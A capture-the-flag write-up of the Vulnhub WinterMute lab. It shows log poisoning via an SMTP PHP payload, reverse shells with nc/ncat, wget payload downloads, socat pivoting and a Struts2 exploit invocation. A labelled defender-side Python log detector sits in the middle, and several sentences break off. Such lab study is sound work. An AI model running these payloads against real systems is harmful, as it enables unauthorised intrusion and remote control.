Vulnhub - WinterMute writeup
This is going to be a very cool machine because it's two VMs: we need to pwn straylight, which is basically a user machine, and then from there we have to pivot to the other one, neuromancer.
wget http://192.168.56.1:8000/libhax.so; wget http://192.168.56.1:8000/rootshell
We can see an SMTP server running. The interesting one is port 3000, which is running hadoop-datanode, a service I'm seeing for the first time on any VM.
Let’s start with HTTP and see what we can find.
This is what we get when we visit the website; after some time this changes and we are shown our so-called contract with the AI named
If we go through the source of that page (xwx.html) we'll find the JS file which basically prints the contract.
I ran gobuster on that to see if I could find anything.
/manual would lead us to the Apache manual, so I decided to look into the
But I found nothing over there, nothing in the source, nothing with gobuster. So I moved on to port
When we visit http://192.168.56.102:3000 we are redirected to http://192.168.56.102:3000/lua/login.lua?referer=/ and we get a login page.
We can see the hint saying the credentials are admin:admin. After login, in the flows section we can see the traffic flow.
Another thing we notice here is directory listing in the info tab. We've already visited /freeside and found nothing. Let's try /turing-bolo on port
If we submit the query for "case" we can see other files listed there. This could mean that there is directory traversal, so I tried ../ but none of my attempts worked. After a lot of trial and error I realised that in the nmap scan we saw an SMTP service running but no POP3 or IMAP. This could mean that SMTP is there just to send something out, and if that is happening then there has to be a log on the system.
I found the logs for mail in
Since we have access to the log we can exploit this to get RCE via the SMTP server: we can send PHP code in the email and then try to access the log.
Using telnet, connect to port 25 and run the following one by one:
MAIL FROM:<email@example.com>
RCPT TO:<?php echo system($_POST['cmd']); ?>
To test whether our poisoning worked, run the following command:
➜ curl -X POST http://192.168.56.102/turing-bolo/bolo.php\?bolo\=/var/log/mail --data "cmd=ls"
We can see the directory listing, and since we have RCE we can get a reverse shell from this.
➜ curl -X POST http://192.168.56.102/turing-bolo/bolo.php\?bolo\=/var/log/mail --data "cmd=nc -e /bin/sh 192.168.56.1 4444"
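As an added defender-side example (not part of the original writeup), the following Python scans a constructed mail log and Apache access log for the two halves of the chain above: PHP tokens landing in SMTP envelope fields, and a request that points bolo.php's file parameter at a log file. The log line formats, the parameter name bolo and the log paths are assumptions based on the writeup.

```python
import re
from urllib.parse import unquote

# Constructed sample logs (not captured from the VM): a postfix-style mail log
# with one RCPT TO carrying PHP, and an access log with one request that
# points bolo.php's file parameter at that mail log (URL-encoded).
MAIL_LOG = [
    "Jan  1 10:00:01 straylight postfix/smtpd[1201]: connect from unknown[192.168.56.1]",
    "Jan  1 10:00:05 straylight postfix/smtpd[1201]: NOQUEUE: reject: RCPT from unknown[192.168.56.1]:"
    " 501 5.1.3 Bad recipient address syntax; from=<email@example.com> to=<?php echo system($_POST['cmd']); ?>",
    "Jan  1 10:01:00 straylight postfix/qmgr[1100]: 3F2A1: from=<alice@example.com>, size=512, nrcpt=1",
]
ACCESS_LOG = [
    '192.168.56.1 - - [01/Jan/2020:10:02:00 +0000] "GET /turing-bolo/bolo.php?bolo=case HTTP/1.1" 200 812',
    '192.168.56.1 - - [01/Jan/2020:10:02:30 +0000] "POST /turing-bolo/bolo.php?bolo=%2Fvar%2Flog%2Fmail HTTP/1.1" 200 2048',
]

# Tokens that never belong in an SMTP envelope address but do belong to PHP.
PHP_MARKERS = re.compile(
    r"<\?php|<\?=|\?>|\$_(?:POST|GET|REQUEST|COOKIE)\b|"
    r"\b(?:system|exec|passthru|shell_exec|popen|eval)\s*\(", re.I)
# File-parameter values that name a log, a proc entry, a PHP wrapper or a traversal.
RISKY_INCLUDE = re.compile(r"/var/log/|/proc/self/|php://|\.\./", re.I)

def find_poisoned_lines(mail_log_lines):
    """Return (line_no, first marker matched) for each mail-log line containing PHP tokens."""
    hits = []
    for n, line in enumerate(mail_log_lines, 1):
        m = PHP_MARKERS.search(line)
        if m:
            hits.append((n, m.group(0)))
    return hits

def find_log_inclusion(access_log_lines, param="bolo"):
    """Return (line_no, decoded value) for requests whose file parameter names a log or wrapper."""
    pat = re.compile(r"[?&]" + re.escape(param) + r'=([^&\s"]+)')
    hits = []
    for n, line in enumerate(access_log_lines, 1):
        m = pat.search(line)
        if m:
            value = unquote(m.group(1))  # decode %2F-style encoding before checking
            if RISKY_INCLUDE.search(value):
                hits.append((n, value))
    return hits

def chain_observed(mail_log_lines, access_log_lines):
    """True when both halves of the poison-then-include chain appear in the logs."""
    return bool(find_poisoned_lines(mail_log_lines)) and bool(find_log_inclusion(access_log_lines))
```

Run the two finders over the real /var/log/mail and the Apache access log to see which side of the chain is present; chain_observed() reporting True is the strong signal that the log was both poisoned and included.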
Since we have a reverse shell we can start enumerating for privilege escalation.
I ran my enumeration script and found a few other users and an SUID
Since we have an SUID I decided to search for an exploit and actually found one for privilege escalation.
I knew this exploit because the same privilege escalation method was used in the DC5 VM, so I did what I did on the DC5 machine (read it here, it's towards the end).
After running the exploit I got the root shell.
Okay, so we've got the root flag for straylight; now it's time to get root on neuromancer.
I read the note in
It gives us a URL, /struts2_18.104.22.168-showcase, but this will not work on the IP we already have. Since the server is running via Tomcat, we'll have to find a way to port scan without nmap (nmap is not installed on the server).
Also, before that we need to find the IP on which neuromancer is running. To do that we use simple bash commands:
for ip in $(seq 1 254); do ping -c 1 192.168.56.$ip; done
This might take some time
The only packet that wasn't lost was to the IP 192.168.56.107, so this means neuromancer is running on that IP. Now let's port scan (without nmap).
for i in $(seq 1 65535); do nc -nvz -w 1 192.168.56.107 $i 2>&1; done | grep -v "Connection refused"
Okay, so there are three open ports:
34483, but the problem is we won't be able to see anything if we try to visit the IP and the ports. To be able to access them we'll have to do port forwarding. For port forwarding we can use socat, e.g.
socat TCP-LISTEN:5000,fork,reuseaddr tcp:127.0.0.1:8080, which means the website on 8080 should be visible at port 5000 from outside. But since we need to do this for three ports we'll have to put & at the end of each command; & in *nix tells the system to execute a command and put it in the background.
In short, we'll be executing the following commands:
socat TCP-LISTEN:8009,fork,reuseaddr tcp:192.168.56.107:8009 &
socat TCP-LISTEN:8000,fork,reuseaddr tcp:192.168.56.107:8080 &
socat TCP-LISTEN:34483,fork,reuseaddr tcp:192.168.56.107:34483 &
Now, before opening them in the browser, let's run nmap on them to see what services are running.
HTTP - Port 8080
But this is not what we want. In the note it said to visit
On visiting that page we can see the Struts2 Showcase welcome page.
I first looked around to see if I could find anything in there, but I didn't. So I searched for an exploit related to Struts2 and found an RCE.
At the end of the exploit we'll find 2 comments:
# $ ncat -v -l -p 4444 &
# $ python exploit_S2-048.py http://127.0.0.1:8080/22.214.171.124-showcase/integration/saveGangster.action "ncat -e /bin/bash 127.0.0.1 4444"
The 1st line sets up the listener and the 2nd shows how to run the exploit. But in our case we'll need something more: another socat port forward, because we need a reverse shell to our machine but straylight is the middle man. So we'll need to forward everything to us.
To do this, run the following command on
socat TCP-LISTEN:1337,fork,reuseaddr TCP:192.168.56.1:1337 &
This is for our reverse shell.